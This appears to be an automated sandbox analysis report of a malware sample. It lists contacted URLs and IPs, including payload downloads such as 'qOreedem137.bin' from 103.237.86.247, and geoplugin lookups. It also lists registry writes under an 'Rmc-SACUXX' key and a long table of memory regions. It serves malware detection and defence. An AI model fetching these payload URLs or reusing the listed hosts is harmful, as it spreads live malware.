https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://103.2
|
unknown
|
||
|
http://geoplugin.net/json.gpM
|
unknown
|
||
|
http://103.237.86.
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://103.237.86.247/Fremmeligste.xsnXRbl038
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://103.237H
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
|
http://103.237.86.247/qOreedem137.bin)
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpa
|
unknown
|
||
|
http://geoplugin.net/json.gpf
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.imvu.compData
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://geoplugin.net/json.gpm
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://103.237.86.247/Fremmeligs
|
unknown
|
||
|
http://103.237.86.247/Fremm
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
|
unknown
|
||
|
http://103.237.86.2
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://103.237.86.247/Fremme
|
unknown
|
||
|
http://103.237.86.247/
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://103.237.86.24
|
unknown
|
||
|
http://103.237.86.247/Fremmeligste.xs
|
unknown
|
||
|
http://103.237.86.247/Fr
|
unknown
|
||
|
http://103.237.86.247/Fremmeligst
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
http://103.237.86.247/qOreedem137.bin
|
103.237.86.247
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
http://103.237.86.247/Fremmeligste.xsn
|
103.237.86.247
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://103.23
|
unknown
|
||
|
http://103.237.86.247/Fre
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 63 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.237.87.156
|
unknown
|
unknown
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
103.237.86.247
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-SACUXX
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-SACUXX
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-SACUXX
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3B66000
|
remote allocation
|
page execute and read and write
|
|
|
|
98C6000
|
direct allocation
|
page execute and read and write
|
|
|
|
582C000
|
heap
|
page read and write
|
|
|
|
2849CCDF000
|
trusted library allocation
|
page read and write
|
|
|
|
210CF000
|
stack
|
page read and write
|
|
|
|
63C4000
|
trusted library allocation
|
page read and write
|
|
|
|
8E50000
|
direct allocation
|
page execute and read and write
|
|
|
|
5811000
|
heap
|
page read and write
|
|
|
|
222CD364000
|
heap
|
page read and write
|
||
|
501F000
|
stack
|
page read and write
|
||
|
21411000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
7FFD345DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
222CD221000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
8B30000
|
trusted library allocation
|
page read and write
|
||
|
222CD3E6000
|
heap
|
page read and write
|
||
|
222CB582000
|
heap
|
page read and write
|
||
|
21823000
|
unclassified section
|
page execute and read and write
|
||
|
771D000
|
stack
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
20DAE000
|
stack
|
page read and write
|
||
|
6249000
|
trusted library allocation
|
page read and write
|
||
|
2DA4000
|
stack
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
222CD23C000
|
heap
|
page read and write
|
||
|
5221000
|
trusted library allocation
|
page read and write
|
||
|
376D000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
7BC0000
|
heap
|
page execute and read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
52D8000
|
heap
|
page read and write
|
||
|
7F210000
|
trusted library allocation
|
page execute and read and write
|
||
|
52D9000
|
heap
|
page read and write
|
||
|
7413EFE000
|
stack
|
page read and write
|
||
|
52D0000
|
heap
|
page read and write
|
||
|
222CB5AE000
|
heap
|
page read and write
|
||
|
5BF9000
|
trusted library allocation
|
page read and write
|
||
|
895C000
|
heap
|
page read and write
|
||
|
5841000
|
heap
|
page read and write
|
||
|
222CD4C0000
|
heap
|
page read and write
|
||
|
5130000
|
direct allocation
|
page read and write
|
||
|
21709000
|
heap
|
page read and write
|
||
|
222CD39F000
|
heap
|
page read and write
|
||
|
5DD000
|
heap
|
page read and write
|
||
|
222CD384000
|
heap
|
page read and write
|
||
|
74145FF000
|
stack
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
5A00000
|
direct allocation
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
216FB000
|
heap
|
page read and write
|
||
|
8E10000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
2848D49A000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
52E7000
|
heap
|
page read and write
|
||
|
222CD3F9000
|
heap
|
page read and write
|
||
|
2848B120000
|
heap
|
page read and write
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
21809000
|
unclassified section
|
page execute and read and write
|
||
|
8E60000
|
direct allocation
|
page read and write
|
||
|
2DCA000
|
stack
|
page read and write
|
||
|
530E000
|
heap
|
page read and write
|
||
|
2848AFB4000
|
heap
|
page read and write
|
||
|
222CD384000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
1AFFF340000
|
heap
|
page read and write
|
||
|
2848B1D0000
|
heap
|
page readonly
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
586D000
|
trusted library allocation
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
314E000
|
stack
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
59E0000
|
direct allocation
|
page read and write
|
||
|
222CB4FC000
|
heap
|
page read and write
|
||
|
222CB55B000
|
heap
|
page read and write
|
||
|
5329000
|
heap
|
page read and write
|
||
|
2DE5000
|
heap
|
page read and write
|
||
|
2DE5000
|
heap
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
21488000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
52DB000
|
heap
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
222CD40B000
|
heap
|
page read and write
|
||
|
7720000
|
heap
|
page read and write
|
||
|
2DA2000
|
stack
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
2848D2EA000
|
trusted library allocation
|
page read and write
|
||
|
2848CAF8000
|
heap
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
20EAE000
|
stack
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
8DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
59E3000
|
trusted library allocation
|
page read and write
|
||
|
2848AF71000
|
heap
|
page read and write
|
||
|
222CD3F9000
|
heap
|
page read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
2118C000
|
stack
|
page read and write
|
||
|
222CB5BD000
|
heap
|
page read and write
|
||
|
52F8000
|
heap
|
page read and write
|
||
|
290F000
|
stack
|
page read and write
|
||
|
8EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DE5000
|
heap
|
page read and write
|
||
|
284A530F000
|
heap
|
page read and write
|
||
|
5287000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
4D60000
|
trusted library allocation
|
page read and write
|
||
|
51C1000
|
heap
|
page read and write
|
||
|
5998000
|
trusted library allocation
|
page read and write
|
||
|
350B000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
3760000
|
heap
|
page read and write
|
||
|
216BB000
|
heap
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2848AFB2000
|
heap
|
page read and write
|
||
|
2848EA9E000
|
trusted library allocation
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
907FC4B000
|
stack
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
57FB000
|
heap
|
page read and write
|
||
|
769B000
|
stack
|
page read and write
|
||
|
222CD39E000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
222CB5AE000
|
heap
|
page read and write
|
||
|
4FDE000
|
stack
|
page read and write
|
||
|
350B000
|
heap
|
page read and write
|
||
|
4D82000
|
trusted library allocation
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
284A5043000
|
heap
|
page read and write
|
||
|
52F8000
|
heap
|
page read and write
|
||
|
222CB4FC000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
2849CC80000
|
trusted library allocation
|
page read and write
|
||
|
218A0000
|
heap
|
page read and write
|
||
|
5856000
|
heap
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
76DE000
|
stack
|
page read and write
|
||
|
79EE000
|
heap
|
page read and write
|
||
|
7AC2000
|
heap
|
page read and write
|
||
|
222CD23C000
|
heap
|
page read and write
|
||
|
52DB000
|
heap
|
page read and write
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
7413CFA000
|
stack
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
20920000
|
direct allocation
|
page read and write
|
||
|
5308000
|
heap
|
page read and write
|
||
|
2848B100000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
52D4000
|
heap
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
3570000
|
trusted library section
|
page read and write
|
||
|
222CD39E000
|
heap
|
page read and write
|
||
|
2FBD000
|
stack
|
page read and write
|
||
|
52EB000
|
heap
|
page read and write
|
||
|
222CD471000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
3507000
|
heap
|
page read and write
|
||
|
20910000
|
direct allocation
|
page read and write
|
||
|
2848AF39000
|
heap
|
page read and write
|
||
|
7A23000
|
heap
|
page read and write
|
||
|
21603000
|
heap
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
222CD3F9000
|
heap
|
page read and write
|
||
|
21511000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
5B3E000
|
trusted library allocation
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
51C1000
|
heap
|
page read and write
|
||
|
222CD38A000
|
heap
|
page read and write
|
||
|
765E000
|
stack
|
page read and write
|
||
|
890E000
|
stack
|
page read and write
|
||
|
216FB000
|
heap
|
page read and write
|
||
|
222CD3A0000
|
heap
|
page read and write
|
||
|
7FFD345D4000
|
trusted library allocation
|
page read and write
|
||
|
284A5011000
|
heap
|
page read and write
|
||
|
21501000
|
heap
|
page read and write
|
||
|
222CD358000
|
heap
|
page read and write
|
||
|
21360000
|
direct allocation
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
52DE000
|
heap
|
page read and write
|
||
|
794E000
|
stack
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
222CB5AE000
|
heap
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FA62FF000
|
unkown
|
page read and write
|
||
|
222CD34D000
|
heap
|
page read and write
|
||
|
2848CE9A000
|
trusted library allocation
|
page read and write
|
||
|
222CB5FD000
|
heap
|
page read and write
|
||
|
5849000
|
heap
|
page read and write
|
||
|
284A5013000
|
heap
|
page read and write
|
||
|
52F3000
|
heap
|
page read and write
|
||
|
97D0000
|
direct allocation
|
page execute and read and write
|
||
|
2848B020000
|
heap
|
page read and write
|
||
|
222CB4FC000
|
heap
|
page read and write
|
||
|
222CD221000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
2848C9E0000
|
trusted library allocation
|
page read and write
|
||
|
7580000
|
direct allocation
|
page read and write
|
||
|
2125F000
|
stack
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
222CB5BC000
|
heap
|
page read and write
|
||
|
8930000
|
heap
|
page read and write
|
||
|
222CD3F0000
|
heap
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
5855000
|
heap
|
page read and write
|
||
|
21489000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
31AE000
|
stack
|
page read and write
|
||
|
75DD000
|
stack
|
page read and write
|
||
|
52D9000
|
heap
|
page read and write
|
||
|
4CE8000
|
heap
|
page read and write
|
||
|
34D0000
|
heap
|
page read and write
|
||
|
A2C6000
|
direct allocation
|
page execute and read and write
|
||
|
52E1000
|
heap
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C60000
|
trusted library allocation
|
page read and write
|
||
|
4E48000
|
trusted library allocation
|
page read and write
|
||
|
222CD23C000
|
heap
|
page read and write
|
||
|
284A52AE000
|
heap
|
page read and write
|
||
|
74140FE000
|
stack
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
21603000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
52F1000
|
heap
|
page read and write
|
||
|
2848EAB2000
|
trusted library allocation
|
page read and write
|
||
|
52EB000
|
heap
|
page read and write
|
||
|
21376000
|
direct allocation
|
page execute and read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
284A52A5000
|
heap
|
page read and write
|
||
|
2849CF68000
|
trusted library allocation
|
page read and write
|
||
|
222CB5F5000
|
heap
|
page read and write
|
||
|
4F5E000
|
stack
|
page read and write
|
||
|
74E000
|
stack
|
page read and write
|
||
|
20C90000
|
heap
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
2848B200000
|
heap
|
page read and write
|
||
|
4566000
|
remote allocation
|
page execute and read and write
|
||
|
4CF0000
|
heap
|
page read and write
|
||
|
5855000
|
heap
|
page read and write
|
||
|
2848D124000
|
trusted library allocation
|
page read and write
|
||
|
222CD540000
|
heap
|
page read and write
|
||
|
3198000
|
heap
|
page read and write
|
||
|
20F7F000
|
stack
|
page read and write
|
||
|
57D0000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
907ED7E000
|
stack
|
page read and write
|
||
|
21830000
|
unclassified section
|
page execute and read and write
|
||
|
222CD4EF000
|
heap
|
page read and write
|
||
|
222CB573000
|
heap
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
2848B205000
|
heap
|
page read and write
|
||
|
222CD221000
|
heap
|
page read and write
|
||
|
2134B000
|
unclassified section
|
page execute and read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
3763000
|
heap
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
2167B000
|
heap
|
page read and write
|
||
|
52DB000
|
heap
|
page read and write
|
||
|
4D88000
|
heap
|
page read and write
|
||
|
222CD38A000
|
heap
|
page read and write
|
||
|
20D2F000
|
stack
|
page read and write
|
||
|
2848D50F000
|
trusted library allocation
|
page read and write
|
||
|
216F6000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
52EB000
|
heap
|
page read and write
|
||
|
52F5000
|
heap
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
284A4FBC000
|
heap
|
page read and write
|
||
|
7FFD34781000
|
trusted library allocation
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
208E0000
|
direct allocation
|
page read and write
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
3590000
|
trusted library allocation
|
page read and write
|
||
|
5856000
|
heap
|
page read and write
|
||
|
222CB5BD000
|
heap
|
page read and write
|
||
|
222CB470000
|
heap
|
page read and write
|
||
|
530E000
|
heap
|
page read and write
|
||
|
3550000
|
heap
|
page read and write
|
||
|
1AFFF100000
|
heap
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
4D42000
|
heap
|
page read and write
|
||
|
222CB4FF000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
315E000
|
stack
|
page read and write
|
||
|
222CD331000
|
heap
|
page read and write
|
||
|
284A5299000
|
heap
|
page read and write
|
||
|
2848B1E0000
|
trusted library allocation
|
page read and write
|
||
|
59F0000
|
direct allocation
|
page read and write
|
||
|
5848000
|
trusted library allocation
|
page read and write
|
||
|
21330000
|
unclassified section
|
page execute and read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
284A52AA000
|
heap
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
284A507A000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
531F000
|
heap
|
page read and write
|
||
|
5882000
|
heap
|
page read and write
|
||
|
20900000
|
direct allocation
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
284A5059000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
222CD3DE000
|
heap
|
page read and write
|
||
|
284A5265000
|
heap
|
page read and write
|
||
|
222CB520000
|
heap
|
page read and write
|
||
|
52D4000
|
heap
|
page read and write
|
||
|
5854000
|
heap
|
page read and write
|
||
|
907FACE000
|
stack
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
32BE000
|
stack
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
52DD000
|
heap
|
page read and write
|
||
|
3580000
|
trusted library section
|
page read and write
|
||
|
222CD3C3000
|
heap
|
page read and write
|
||
|
4CF0000
|
heap
|
page read and write
|
||
|
2170E000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
2848D4FE000
|
trusted library allocation
|
page read and write
|
||
|
222CD384000
|
heap
|
page read and write
|
||
|
50F0000
|
trusted library allocation
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
222CB54E000
|
heap
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
52E4000
|
heap
|
page read and write
|
||
|
2848C9B0000
|
trusted library allocation
|
page read and write
|
||
|
2848AF6D000
|
heap
|
page read and write
|
||
|
5301000
|
heap
|
page read and write
|
||
|
21510000
|
heap
|
page read and write
|
||
|
761A000
|
stack
|
page read and write
|
||
|
5A78000
|
trusted library allocation
|
page read and write
|
||
|
52DF000
|
heap
|
page read and write
|
||
|
284A52EC000
|
heap
|
page read and write
|
||
|
222CB4C8000
|
heap
|
page read and write
|
||
|
222CB5BD000
|
heap
|
page read and write
|
||
|
52F1000
|
heap
|
page read and write
|
||
|
5C8E000
|
trusted library allocation
|
page read and write
|
||
|
4E2E000
|
stack
|
page read and write
|
||
|
222CD450000
|
remote allocation
|
page read and write
|
||
|
2848B160000
|
heap
|
page read and write
|
||
|
1AFFF110000
|
heap
|
page read and write
|
||
|
222CD3B8000
|
heap
|
page read and write
|
||
|
52E4000
|
heap
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
52F8000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
69B000
|
stack
|
page read and write
|
||
|
5903000
|
trusted library allocation
|
page read and write
|
||
|
222CB521000
|
heap
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
1AFFF134000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
58B8000
|
trusted library allocation
|
page read and write
|
||
|
7990000
|
heap
|
page read and write
|
||
|
1AFFF135000
|
heap
|
page read and write
|
||
|
222CD407000
|
heap
|
page read and write
|
||
|
222CD39E000
|
heap
|
page read and write
|
||
|
284A52AC000
|
heap
|
page read and write
|
||
|
7FFD3478A000
|
trusted library allocation
|
page read and write
|
||
|
907E79E000
|
stack
|
page read and write
|
||
|
52D8000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
5973000
|
trusted library allocation
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
2848AF2E000
|
heap
|
page read and write
|
||
|
222CCDC0000
|
heap
|
page read and write
|
||
|
217B0000
|
unclassified section
|
page execute and read and write
|
||
|
21511000
|
heap
|
page read and write
|
||
|
4E30000
|
heap
|
page readonly
|
||
|
7DF495B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
8DEC000
|
stack
|
page read and write
|
||
|
222CD3D3000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
52EF000
|
heap
|
page read and write
|
||
|
52D8000
|
heap
|
page read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
6221000
|
trusted library allocation
|
page read and write
|
||
|
52F8000
|
heap
|
page read and write
|
||
|
5210000
|
heap
|
page execute and read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
52E1000
|
heap
|
page read and write
|
||
|
222CB5BD000
|
heap
|
page read and write
|
||
|
5856000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
222CD3B4000
|
heap
|
page read and write
|
||
|
222CD23C000
|
heap
|
page read and write
|
||
|
21410000
|
heap
|
page read and write
|
||
|
537C000
|
trusted library allocation
|
page read and write
|
||
|
530E000
|
heap
|
page read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
222CD4C1000
|
heap
|
page read and write
|
||
|
5140000
|
direct allocation
|
page read and write
|
||
|
4DA9000
|
heap
|
page read and write
|
||
|
216AC000
|
heap
|
page read and write
|
||
|
585D000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
222CD4EE000
|
heap
|
page read and write
|
||
|
222CD253000
|
heap
|
page read and write
|
||
|
222CD3C6000
|
heap
|
page read and write
|
||
|
338F000
|
stack
|
page read and write
|
||
|
2DE5000
|
heap
|
page read and write
|
||
|
79EA000
|
heap
|
page read and write
|
||
|
2F7C000
|
stack
|
page read and write
|
||
|
5B28000
|
trusted library allocation
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
2848B1A0000
|
trusted library allocation
|
page read and write
|
||
|
2110C000
|
stack
|
page read and write
|
||
|
2848CAF6000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
2158A000
|
heap
|
page read and write
|
||
|
222CD344000
|
heap
|
page read and write
|
||
|
2848AF8B000
|
heap
|
page read and write
|
||
|
222CB566000
|
heap
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
52F5000
|
heap
|
page read and write
|
||
|
222CB490000
|
heap
|
page read and write
|
||
|
531D000
|
heap
|
page read and write
|
||
|
8E40000
|
trusted library allocation
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
35BC000
|
heap
|
page read and write
|
||
|
284A501A000
|
heap
|
page read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
5308000
|
heap
|
page read and write
|
||
|
1AFFF17B000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
52D9000
|
heap
|
page read and write
|
||
|
2114F000
|
stack
|
page read and write
|
||
|
5314000
|
heap
|
page read and write
|
||
|
52D0000
|
trusted library allocation
|
page read and write
|
||
|
216FB000
|
heap
|
page read and write
|
||
|
5307000
|
heap
|
page read and write
|
||
|
52D8000
|
heap
|
page read and write
|
||
|
3388000
|
heap
|
page read and write
|
||
|
2848CB0A000
|
heap
|
page read and write
|
||
|
33CE000
|
stack
|
page read and write
|
||
|
2848E519000
|
trusted library allocation
|
page read and write
|
||
|
222CD224000
|
heap
|
page read and write
|
||
|
51D0000
|
direct allocation
|
page read and write
|
||
|
52D1000
|
heap
|
page read and write
|
||
|
216F6000
|
heap
|
page read and write
|
||
|
222CD4C0000
|
heap
|
page read and write
|
||
|
52EC000
|
heap
|
page read and write
|
||
|
208F0000
|
direct allocation
|
page read and write
|
||
|
65C000
|
stack
|
page read and write
|
||
|
2DE5000
|
heap
|
page read and write
|
||
|
356F000
|
stack
|
page read and write
|
||
|
35A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
798E000
|
stack
|
page read and write
|
||
|
222CD38A000
|
heap
|
page read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
2848CCF9000
|
trusted library allocation
|
page read and write
|
||
|
222CD364000
|
heap
|
page read and write
|
||
|
20EEF000
|
stack
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
907FBCD000
|
stack
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
52F2000
|
heap
|
page read and write
|
||
|
907E7DF000
|
stack
|
page read and write
|
